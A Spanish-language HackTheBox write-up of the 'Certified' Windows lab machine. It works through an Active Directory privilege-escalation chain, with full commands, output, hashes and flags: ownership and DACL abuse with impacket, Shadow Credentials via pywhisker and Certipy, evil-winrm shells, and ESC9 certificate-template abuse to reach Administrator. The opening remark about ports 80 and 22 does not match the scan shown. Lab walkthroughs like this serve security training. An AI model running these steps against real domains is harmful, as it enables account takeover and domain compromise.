This page looks best with JavaScript enabled

HackTheBox - Certified

Certified provee credenciales de un primer usuario. Con estas, explotamos WriteOwner y GenericWrite para acceder a un segundo usuario. Este ultimo tiene permisos GenericAll sobre otro usuario. A traves de este, conseguimos acceder a un tercer usuario. Con este ultimo identificamos ESC9 y, tras la explotacion logramos aceder como administrator.

Nombre Certified box_img_maker
OS

Windows

Puntos 30
Dificultad Medium
Fecha de Salida 2024-11-02
IP 10.10.11.41
Maker

ruycr4ft

Rated
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [132, 101, 571, 822, 1060, 598, 347, 67, 24, 26],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Machine Information

As is common in real life Windows pentests, you will start this box with credentials for the following account: judith.mader / judith09

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
# Nmap 7.95 scan initiated Sun Feb  2 00:30:12 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,9389,49666,49668,49673,49674,49681,49716,49741,49774 -sV -sC -oN nmap_scan 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.088s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-02 12:30:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
|_ssl-date: 2025-02-02T12:31:53+00:00; +7h00m03s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-02T12:31:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after:  2025-05-13T15:49:36
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=2/2%Time=679F02F9%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m03s, deviation: 0s, median: 7h00m03s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-02T12:31:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb  2 00:31:50 2025 -- 1 IP address (1 host up) scanned in 97.89 seconds

SMB & LDAP

crackmapexec muestra que las credenciales tienen acceso a SMB.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
❯ crackmapexec smb 10.10.11.41 -u "judith.mader" -p "judith09" --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.10.11.41     445    DC01             [+] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share 

De igual forma por el servicio LDAP.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ ldapsearch -H ldap://certified.htb -D 'judith.mader@certified.htb' -w judith09 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=certified,DC=htb
namingcontexts: CN=Configuration,DC=certified,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=certified,DC=htb
namingcontexts: DC=DomainDnsZones,DC=certified,DC=htb
namingcontexts: DC=ForestDnsZones,DC=certified,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Bloodhound

Ejecutamos bloodhound-python con las credenciales de judith especificando la compresion en zip para importarlo a bloodhound.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
❯ bloodhound-python -u judith.mader -p "judith09" -ns 10.10.11.41 -d certified.htb -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.certified.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 15S
INFO: Compressing output into 20250204061108_bloodhound.zip

Path to Admin

‘Shortest path to here from Owned’ de bloodhound sugiere un camino a seguir para llegar a Administrator, primero obteniendo acceso como management_svc.

image

Judith tiene permisos “WriteOwner” sobre el grupo Management y este ultimo “GenericWrite” sobre management_svc, con estos dos permisos podriamos llegar a este ultimo usuario.

image

User - management_svc

Ownership & FullControll on Management

Ejecutamos owneredit y dacledit para obtener acceso sobre el grupo Management.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
# Granting Ownership
❯ impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
# Granting Full Control
❯ impacket-dacledit -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'CERTIFIED/judith.mader:judith09' -dc-ip 10.10.11.41 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250204-064047.bak
[*] DACL modified successfully!

Al tener control sobre el grupo podemos agregar a Judith a este, verificamos los usuarios dentro del grupo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# Add judith to Management group
# net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41

# Check members of Management group 
# net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group addmem "Management" "judith.mader" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
❯ net rpc group MEMBERS "Management" -U 'CERTIFIED.HTB/judith.mader%judith09' -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc

Shadow Credentials

Bloodhound recomienda Targeted Kerberoast y Shadow Credentials. Utilizamos pywhisker y solucionamos un error en el modulo de OpenSSL.crypto tras instalar la version de openssl 24 y crypthography 41.

Ejecutamos pywhisker el cual muestra el atributo msDS-KeyCredentialLink vacio, nuevamente realizamos la ejecucion esta vez con la accion add, se muestra como exitosa, tambien se solicita un certificado que puede ser utilizado para obtener un TGT con la herramienta PKINITtools.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
# action: list
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "list"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Attribute msDS-KeyCredentialLink is either empty or user does not have read permissions on that attribute
# action: add
❯ python pywhisker.py -d "CERTIFIED.HTB" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: bdb48b22-e092-48a0-876b-936d641db4b6
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Mu21Nexs.pfx
[*] Must be used with password: PHbokfyjxLWtcP4yNyQe
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

TGT management_svc - PKINITtools

Solicitamos el ticket con gettgtpkinit pasando el certificado y contrasena anteriormente generado.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# TGT request
❯ python ../tools/PKINITtools/gettgtpkinit.py -cert-pfx Mu21Nexs.pfx -pfx-pass PHbokfyjxLWtcP4yNyQe certified.htb/management_svc Mu21Nexs.ccache
2025-02-04 07:11:59,908 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-04 07:11:59,918 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-04 07:12:15,347 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-04 07:12:15,348 minikerberos INFO     a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
INFO:minikerberos:a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52
2025-02-04 07:12:15,349 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

Recover the NT Hash - PKINITtools

getnthash nos permite obtener el nt hash de management_svc especificando el ticket.

1
2
3
4
5
6
7
8
9
# Recover the NT Hash
export KRB5CCNAME=Mu21Nexs.ccache; python3 ../tools/PKINITtools/getnthash.py -key a9e68b539ecf4b8597c356c51d1e8bd9b16f4d2cb6b546e299eabf2ccda95a52 certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584

TGT & NT Hash - Certipy

Podemos obtener tambien el ticket y el hash utilizando certipy.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
# TGT & NT Hash
❯ certipy-ad cert -export -pfx Mu21Nexs.pfx -password "PHbokfyjxLWtcP4yNyQe" -out unprotected_pfx.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'unprotected_pfx.pfx'
❯ certipy-ad auth -pfx unprotected_pfx.pfx -username "management_svc" -domain "CERTIFIED.HTB"
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Got hash for 'management_svc@certified.htb': aad3b435b51404eeaad3b435b51404ee:a091c1832bcdd4677c28b5a6a1295584

Shadow Credentials - Certipy

De igual forma podemos realizar Shadow Credentials con Certipy, obtenemos directamente el TGT y nt hash de management_svc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
# auto shadow credentials - certipy
❯ certipy-ad shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '97ceda79-c6f7-d035-510c-84dbe64975a2'
[*] Adding Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '97ceda79-c6f7-d035-510c-84dbe64975a2' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

Shell

Utilizamos el hash en el servicio winrm logrando acceder a la maquina y obtener la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
❯ evil-winrm -i certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc
*Evil-WinRM* PS C:\Users\management_svc\Documents> dir ../Desktop


    Directory: C:\Users\management_svc\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/1/2025   8:17 AM             34 user.txt


*Evil-WinRM* PS C:\Users\management_svc\Documents> cat ../Desktop/user.txt
4ce4958305057e0df7e34a30d7c9b4e0
*Evil-WinRM* PS C:\Users\management_svc\Documents>

User - operator_ca

Bloodhound muestra y sugiere DCsync sobre Active Directory, pero management_svc no pertenece al grupo de Domain Admins.

image

El unico usuario accesible es ca_operator, management_svc tiene permisos GenericAll sobre este.

image

Shadow Credentials

Bloodhound sugiere shadow credentials, utilizamos certipy para ejecutar este ataque logrando obtener el hash de este usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
❯ certipy-ad shadow auto -u management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '7895b679-029c-6a52-eb80-d38aaa80b34b'
[*] Adding Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID '7895b679-029c-6a52-eb80-d38aaa80b34b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

ESC9

Con el hash de ca_operator ejecutamos certipy para verificar certificados vulnerables. Observamos que CertifiedAuthentication es vulnerable a ESC9.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
❯ certipy-ad find -vulnerable -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.10.11.41 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals       : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension

Privesc

Para realizar la explotacion de ESC9 debemos de tener permisos GenericWrite sobre otra cuenta. En este caso se aplica ya que tenemos permisos GenericAll sobre ca_operator, y este ultimo tiene permisos sobre la plantilla del certificado vulnerable.

Teniendo el hash de ca_operator, iniciamos cambiando el userPrincipalName de ca_operator a Administrator.

1
2
3
4
5
6
7
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

Como ca_operator solicitamos un certificado a la plantilla vulnerable CertifiedAuthentication.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
❯ certipy-ad req -u ca_operator@certified.htb -hashes b4b86f45c6018f1b664f70805f45d8f2 -ca "certified-DC01-CA" -template CertifiedAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Regresamos nuevamente el valor original de userPrincipalName del usuario ca_operator.

1
2
3
4
5
6
7
❯ certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operater@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operater@certified.htb
[*] Successfully updated 'ca_operator'

Ahora con el certificado que solicitamos anteriormente intentamos obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
❯ certipy-ad auth -pfx administrator.pfx -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Shell

Con el hash logramos el acceso como administrator y la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34 -s .
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         2/2/2025   7:31 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
2e166de877e3683a84c6120a9909e6b0
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

Ref.

Share on

Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe